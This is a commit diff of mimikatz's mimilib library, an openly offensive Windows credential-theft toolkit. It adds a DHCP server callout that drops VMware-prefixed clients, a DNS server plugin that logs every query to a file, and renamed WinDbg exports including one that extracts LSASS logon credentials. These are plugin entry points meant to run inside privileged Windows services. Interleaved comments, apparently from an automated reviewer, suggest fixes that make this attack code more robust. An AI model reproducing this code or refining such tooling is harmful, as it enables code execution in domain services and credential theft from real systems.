
Commit 22eaf29

committed
[new] mimilib now supports DHCP Callout, DNS Plugin, Coffee
1 parent 4c70f14 commit 22eaf29

14 files changed

+2458
-19
lines changed

inc/DhcpSSdk.h

+495

inc/cardmod.h

+1,799

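--- a/inc/globals.h
+++ b/inc/globals.h
@@ -70,6 +70,10 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define MS_ENH_RSA_AES_PROV_XP L"Microsoft Enhanced RSA and AES Cryptographic Provider (Prototype)"
 #endif
 
+#ifndef SCARD_PROVIDER_CARD_MODULE
+#define SCARD_PROVIDER_CARD_MODULE 0x80000001
+#endif
+
 #define RtlEqualGuid(L1, L2) (RtlEqualMemory(L1, L2, sizeof(GUID)))
 
 #define SIZE_ALIGN(size, alignment) (size + ((size % alignment) ? (alignment - (size % alignment)) : 0))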
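Review bot: The new `#ifndef SCARD_PROVIDER_CARD_MODULE` fallback carries no explanation of why the project defines a value that normally comes from the platform smart-card headers, so a later SDK bump that ships a different value would silently win or lose depending on include order. A one-line comment such as `// fallback for SDKs whose winscard.h predates this provider id; must match the SDK value` above the `#ifndef` would make the intent and the maintenance obligation explicit. The surrounding `#endif` on the line above belongs to a conditional that starts outside the hunk.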

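--- a/mimikatz.sln
+++ b/mimikatz.sln
@@ -12,7 +12,9 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "global files", "global file
 EndProject
 Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "inc", "inc", "{282B4B77-BFF6-4DCA-9A60-6F4036929AEE}"
 ProjectSection(SolutionItems) = preProject
+inc\cardmod.h = inc\cardmod.h
 inc\DbgHelp.h = inc\DbgHelp.h
+inc\DhcpSSdk.h = inc\DhcpSSdk.h
 inc\DsGetDC.h = inc\DsGetDC.h
 inc\globals.h = inc\globals.h
 inc\Midles.h = inc\Midles.h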

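--- a/mimilib/kdhcp.c
+++ b/mimilib/kdhcp.c
@@ -0,0 +1,56 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kdhcp.h"
+
+HMODULE kdhcp_nextLibrary = NULL;
+LPDHCP_NEWPKT kdhcp_nextLibraryCalloutNewPkt = NULL;
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
+{
+if((ul_reason_for_call == DLL_PROCESS_DETACH) && kdhcp_nextLibrary)
+FreeLibrary(kdhcp_nextLibrary);
+return TRUE;
+}
+
+DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl)
+{
+LPDHCP_ENTRY_POINT_FUNC nextEntry;
+RtlZeroMemory(CalloutTbl, sizeof(DHCP_CALLOUT_TABLE));
+
+if(ChainDlls)
+if(kdhcp_nextLibrary = LoadLibrary(ChainDlls))
+if(nextEntry = (LPDHCP_ENTRY_POINT_FUNC) GetProcAddress(kdhcp_nextLibrary, DHCP_CALLOUT_ENTRY_POINT))
+nextEntry(ChainDlls + lstrlenW(ChainDlls) + 1, CalloutVersion, CalloutTbl);
+
+if(CalloutTbl->DhcpNewPktHook)
+kdhcp_nextLibraryCalloutNewPkt = CalloutTbl->DhcpNewPktHook;
+CalloutTbl->DhcpNewPktHook = kdhcp_DhcpNewPktHook;
+
+return ERROR_SUCCESS;
+}
+
+const BYTE macToBlack[][MAC_ADDRESS_SIZE] = {
+{0x00, 0x0c, 0x29, 0x00, 0x00, 0x00},
+{0x00, 0x50, 0x56, 0x00, 0x00, 0x00}
+};
+DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt)
+{
+DWORD status = ERROR_SUCCESS, m;
+*ProcessIt = TRUE;
+
+for(m = 0; m < ARRAYSIZE(macToBlack); m++)
+{
+if(RtlEqualMemory(*Packet + MAC_SOURCE_ADDRESS_OFFSET, macToBlack[m], MAC_ADDRESS_SIZE / 2)) // just the start of the address
+{
+*ProcessIt = FALSE;
+status = DHCP_DROP_INVALID;
+break;
+}
+}
+if(kdhcp_nextLibraryCalloutNewPkt && *ProcessIt)
+status = kdhcp_nextLibraryCalloutNewPkt(Packet, PacketSize, IpAddress, Reserved, PktContext, ProcessIt);
+return status;
+}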
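Review bot: kdhcp_DhcpNewPktHook compares three bytes at `*Packet + MAC_SOURCE_ADDRESS_OFFSET` (line 46) without first checking that the packet is at least that long, so a truncated datagram reaching the callout could make the DHCP server process read past the packet buffer; guard the loop with `if(*PacketSize >= MAC_SOURCE_ADDRESS_OFFSET + MAC_ADDRESS_SIZE / 2)` placed before the `for`. DllMain (lines 13-14) calls FreeLibrary during DLL_PROCESS_DETACH, which Microsoft's DllMain guidance warns against because the loader lock is held; releasing the chained callout from an explicit teardown path, or leaving it to process exit, avoids that. kdhcp_DhcpServerCalloutEntry discards the return value of `nextEntry` and never resets `kdhcp_nextLibrary` when GetProcAddress fails on line 25, so a loaded but unusable chained DLL stays resident and is still freed later. A short comment above `macToBlack` saying that only the first half of each entry is matched would make the `/ 2` on line 46 self-explanatory.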

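--- a/mimilib/kdhcp.h
+++ b/mimilib/kdhcp.h
@@ -0,0 +1,14 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "utils.h"
+#include <dhcpssdk.h>
+
+#define MAC_ADDRESS_SIZE 6
+#define MAC_SOURCE_ADDRESS_OFFSET 28
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved);
+DWORD CALLBACK kdhcp_DhcpServerCalloutEntry(IN LPWSTR ChainDlls, IN DWORD CalloutVersion, IN OUT LPDHCP_CALLOUT_TABLE CalloutTbl);
+DWORD CALLBACK kdhcp_DhcpNewPktHook(IN OUT LPBYTE *Packet, IN OUT DWORD *PacketSize, IN DWORD IpAddress, IN LPVOID Reserved, IN OUT LPVOID *PktContext, OUT LPBOOL ProcessIt);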
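Review bot: kdhcp.h has no include guard, while the sibling kdns.h added in the same commit opens with `#pragma once`; add `#pragma once` before `#include "utils.h"` so the two new headers are consistent and safe to include twice. `MAC_SOURCE_ADDRESS_OFFSET 28` is a bare magic number; it appears to be the offset of the client hardware address (chaddr) field in the BOOTP/DHCP message header, and a comment like `// offset of chaddr in the BOOTP/DHCP header (RFC 2131)` would record that for the next reader. Since kdhcp.c only ever compares `MAC_ADDRESS_SIZE / 2` bytes, a dedicated constant for the compared prefix length would state the intent more clearly than the division.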

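--- a/mimilib/kdns.c
+++ b/mimilib/kdns.c
@@ -0,0 +1,30 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kdns.h"
+
+DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
+{
+return ERROR_SUCCESS;
+}
+
+DWORD WINAPI kdns_DnsPluginCleanup()
+{
+return ERROR_SUCCESS;
+}
+
+DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
+{
+FILE * kdns_logfile;
+#pragma warning(push)
+#pragma warning(disable:4996)
+if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
+#pragma warning(pop)
+{
+klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
+fclose(kdns_logfile);
+}
+return ERROR_SUCCESS;
+}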
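Review bot: kdns_DnsPluginQuery opens `kiwidns.log` through a relative path on line 23, so the file is created wherever the hosting DNS service's current directory happens to be, and it is opened and closed again for every single query; resolving the path once (for example in kdns_DnsPluginInitialize) or at least commenting the intended location would make the behaviour predictable. The `fclose` result on line 27 is ignored, so a failed flush of the appended line is silent — fine for best-effort logging, but a comment like `// best-effort logging; write failures are intentionally ignored` should say so. `ppDnsRecordListHead` is never written; if the plugin contract expects the callee to set it, initialise `*ppDnsRecordListHead = NULL` before returning — the contract is not visible from this page, so please confirm.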

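--- a/mimilib/kdns.h
+++ b/mimilib/kdns.h
@@ -0,0 +1,19 @@
+/* Benjamin DELPY `gentilkiwi`
+http://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "utils.h"
+
+#define PLUGIN_ALLOCATOR_FUNCTION PVOID
+#define PLUGIN_FREE_FUNCTION PVOID
+#define PDB_RECORD PVOID
+
+DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction);
+DWORD WINAPI kdns_DnsPluginCleanup();
+DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead);
+// DnsPluginQuery2
+// DnsPluginQueryZoneScope
+// DnsPluginQueryServerScope
+// DnsPluginQueryCacheScope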
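Review bot: `kdns_DnsPluginCleanup()` on line 14 is declared with empty parentheses, which in C means "unspecified arguments" rather than a no-argument prototype; write `DWORD WINAPI kdns_DnsPluginCleanup(void);` here and in the matching definition in kdns.c. The `#define PLUGIN_ALLOCATOR_FUNCTION PVOID` stand-ins on lines 9-11 erase the real function-pointer and record types, so the compiler cannot check the exported signatures against the DNS plugin interface; typedefs with the actual pointer types, or a comment stating that the real definitions are deliberately not pulled in, would tell the next reader whether this is a shortcut or a constraint. The commented-out names on lines 16-19 read as a to-do list and would be clearer with an explicit `// TODO: not implemented:` lead-in.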

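--- a/mimilib/mimilib.def
+++ b/mimilib/mimilib.def
@@ -1,11 +1,20 @@
 LIBRARY
 EXPORTS
 startW = kappfree_startW
+
 SpLsaModeInitialize = kssp_SpLsaModeInitialize
+
 InitializeChangeNotify = kfilt_InitializeChangeNotify
 PasswordChangeNotify = kfilt_PasswordChangeNotify
 
-WinDbgExtensionDllInit = WinDbgExtensionDllInit
-ExtensionApiVersion = ExtensionApiVersion
-
-mimikatz = mimikatz
+WinDbgExtensionDllInit = kdbg_WinDbgExtensionDllInit
+ExtensionApiVersion = kdbg_ExtensionApiVersion
+coffee = kdbg_coffee
+mimikatz = kdbg_mimikatz
+
+DnsPluginInitialize = kdns_DnsPluginInitialize
+DnsPluginCleanup = kdns_DnsPluginCleanup
+DnsPluginQuery = kdns_DnsPluginQuery
+
+DhcpServerCalloutEntry = kdhcp_DhcpServerCalloutEntry
+DhcpNewPktHook = kdhcp_DhcpNewPktHook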
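Review bot: `DhcpNewPktHook` is exported by name on line 20, yet kdhcp.c hands that hook to the server through the callout table filled in by `DhcpServerCalloutEntry`, so the by-name export appears redundant — worth confirming against the DHCP callout SDK before removing it. After this change one module exports an LSA security package, a password filter, a WinDbg extension, a DNS plugin and a DHCP callout entry point; that combination of export names is a distinctive indicator for defenders, and a short comment block at the top of the .def grouping the exports by the hosting service would document the resulting surface for maintainers as well.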

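--- a/mimilib/mimilib.vcxproj
+++ b/mimilib/mimilib.vcxproj
@@ -88,6 +88,8 @@
 </ItemGroup>
 <ItemGroup>
 <ClCompile Include="kappfree.c" />
+<ClCompile Include="kdhcp.c" />
+<ClCompile Include="kdns.c" />
 <ClCompile Include="kfilt.c" />
 <ClCompile Include="kssp.c" />
 <ClCompile Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.c" />
@@ -99,6 +101,8 @@
 <ClCompile Include="utils.c" />
 </ItemGroup>
 <ItemGroup>
+<ClInclude Include="kdhcp.h" />
+<ClInclude Include="kdns.h" />
 <ClInclude Include="kfilt.h" />
 <ClInclude Include="kssp.h" />
 <ClInclude Include="sekurlsadbg\kuhl_m_sekurlsa_nt6.h" />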

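--- a/mimilib/mimilib.vcxproj.filters
+++ b/mimilib/mimilib.vcxproj.filters
@@ -29,6 +29,8 @@
 <ClCompile Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.c">
 <Filter>sekurlsadbg</Filter>
 </ClCompile>
+<ClCompile Include="kdns.c" />
+<ClCompile Include="kdhcp.c" />
 </ItemGroup>
 <ItemGroup>
 <ClInclude Include="utils.h" />
@@ -52,6 +54,8 @@
 <ClInclude Include="sekurlsadbg\kull_m_rpc_ms-credentialkeys.h">
 <Filter>sekurlsadbg</Filter>
 </ClInclude>
+<ClInclude Include="kdns.h" />
+<ClInclude Include="kdhcp.h" />
 </ItemGroup>
 <ItemGroup>
 <Filter Include="sekurlsadbg">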

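--- a/mimilib/sekurlsadbg/kwindbg.c
+++ b/mimilib/sekurlsadbg/kwindbg.c
@@ -15,17 +15,12 @@ EXT_API_VERSION g_ExtApiVersion = {5 , 5 ,
 , 0};
 USHORT NtBuildNumber = 0;
 
-LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void)
+LPEXT_API_VERSION WDBGAPI kdbg_ExtensionApiVersion(void)
 {
 return &g_ExtApiVersion;
 }
 
-VOID CheckVersion(void)
-{
-return;
-}
-
-VOID WDBGAPI WinDbgExtensionDllInit(PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion)
+VOID WDBGAPI kdbg_WinDbgExtensionDllInit(PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion)
 {
 ExtensionApis = *lpExtensionApis;
 NtBuildNumber = usMinorVersion;
@@ -80,7 +75,12 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
 {sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonTime), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonServer)},
 };
 
-DECLARE_API(mimikatz)
+DECLARE_API(kdbg_coffee)
+{
+dprintf("\n ( (\n ) )\n .______.\n | |]\n \\ /\n `----'\n");
+}
+
+DECLARE_API(kdbg_mimikatz)
 {
 ULONG_PTR pInitializationVector = 0, phAesKey = 0, ph3DesKey = 0, pLogonSessionList = 0, pLogonSessionListCount = 0, pSecData = 0, pDomainList = 0;
 PLIST_ENTRY LogonSessionList;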

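--- a/mimilib/sekurlsadbg/kwindbg.h
+++ b/mimilib/sekurlsadbg/kwindbg.h
@@ -59,10 +59,10 @@ typedef struct _KUHL_M_SEKURLSA_ENUM_HELPER {
 ULONG offsetToLogonServer;
 } KUHL_M_SEKURLSA_ENUM_HELPER, *PKUHL_M_SEKURLSA_ENUM_HELPER;
 
-LPEXT_API_VERSION WDBGAPI ExtensionApiVersion (void);
-VOID CheckVersion(void);
-VOID WDBGAPI WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
-DECLARE_API(mimikatz);
+LPEXT_API_VERSION WDBGAPI kdbg_ExtensionApiVersion(void);
+VOID WDBGAPI kdbg_WinDbgExtensionDllInit (PWINDBG_EXTENSION_APIS lpExtensionApis, USHORT usMajorVersion, USHORT usMinorVersion);
+DECLARE_API(kdbg_coffee);
+DECLARE_API(kdbg_mimikatz);
 
 VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags);
 VOID kuhl_m_sekurlsa_genericKeyOutput(struct _KIWI_CREDENTIAL_KEY * key);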

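--- a/modules/kull_m_crypto.c
+++ b/modules/kull_m_crypto.c
@@ -131,6 +131,8 @@ BOOL kull_m_crypto_close_hprov_delete_container(HCRYPTPROV hProv)
 }
 }
 }
+if(!status)
+PRINT_ERROR_AUTO(L"CryptGetProvParam/CryptAcquireContextA");
 return status;
 }
 
@@ -554,9 +556,10 @@ BOOL kull_m_crypto_DerAndKeyToPfx(LPCVOID der, DWORD derLen, LPCVOID key, DWORD
 CryptDestroyKey(hCryptKey);
 }
 else PRINT_ERROR_AUTO(L"CryptImportKey");
-CryptReleaseContext(hCryptProv, 0);
-if(!CryptAcquireContext(&hCryptProv, infos.pwszContainerName, NULL, PROV_RSA_FULL, CRYPT_DELETEKEYSET))
-PRINT_ERROR(L"Unable to delete temp keyset %s\n", infos.pwszContainerName);
+kull_m_crypto_close_hprov_delete_container(hCryptProv);
+//CryptReleaseContext(hCryptProv, 0);
+//if(!CryptAcquireContext(&hCryptProv, infos.pwszContainerName, NULL, PROV_RSA_FULL, CRYPT_DELETEKEYSET))
+// PRINT_ERROR(L"Unable to delete temp keyset %s\n", infos.pwszContainerName);
 }
 else PRINT_ERROR_AUTO(L"CryptAcquireContext");
 LocalFree(infos.pwszContainerName);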
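Review bot: The three commented-out lines 560-562 in the second hunk duplicate what `kull_m_crypto_close_hprov_delete_container` now does and should be deleted rather than kept as dead code. The helper's BOOL result is discarded on line 559, so when releasing the context or deleting the temporary container fails, the imported private key may remain in that container on disk and kull_m_crypto_DerAndKeyToPfx cannot report it beyond the helper's own PRINT_ERROR_AUTO; folding the result into the function's return value, e.g. `if(!kull_m_crypto_close_hprov_delete_container(hCryptProv)) status = FALSE;` if a `status` variable exists there, would let callers notice. In the first hunk the new message names two APIs (`CryptGetProvParam/CryptAcquireContextA`), which leaves the reader unsure which call produced the reported error; the body of that function starts outside the hunk, so I cannot tell whether `status` distinguishes the two, and a message per failing call would be clearer if it does.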
